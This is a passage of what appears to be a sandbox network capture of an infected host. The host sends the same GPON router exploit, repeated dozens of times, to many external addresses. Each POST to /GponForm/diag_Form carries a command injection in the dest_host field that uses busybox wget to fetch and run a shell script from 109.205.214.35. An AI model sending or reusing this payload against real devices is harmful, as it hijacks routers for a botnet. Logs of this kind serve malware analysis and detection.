                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1746192.168.2.1354462109.219.243.153443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817262888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1747192.168.2.1336116118.223.3.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817269087 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1748192.168.2.133489042.160.36.64443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817354918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1749192.168.2.1355038109.84.12.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817370892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1750192.168.2.1346012212.236.254.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817388058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1751192.168.2.1359702109.238.11.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817420959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1752192.168.2.1358770118.131.209.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817423105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1753192.168.2.13474145.71.246.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817491055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1754192.168.2.13527925.176.153.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817507982 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1755192.168.2.1356960118.81.92.116443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817533970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1756192.168.2.1345310212.72.133.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817549944 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1757192.168.2.1343782109.156.85.96443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817598104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1758192.168.2.1347574109.237.2.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817656040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1759192.168.2.13414365.44.106.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817656994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1760192.168.2.1356404109.236.179.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817708969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1761192.168.2.13580485.48.49.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817713022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1762192.168.2.135188842.6.212.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817744970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1763192.168.2.1340078212.31.224.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817754030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1764192.168.2.1351234212.76.20.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817754984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1765192.168.2.1339246118.231.219.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817821980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1766192.168.2.13572665.66.231.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817883015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1767192.168.2.1340100212.120.237.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817883015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1768192.168.2.1357204118.92.194.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817914963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
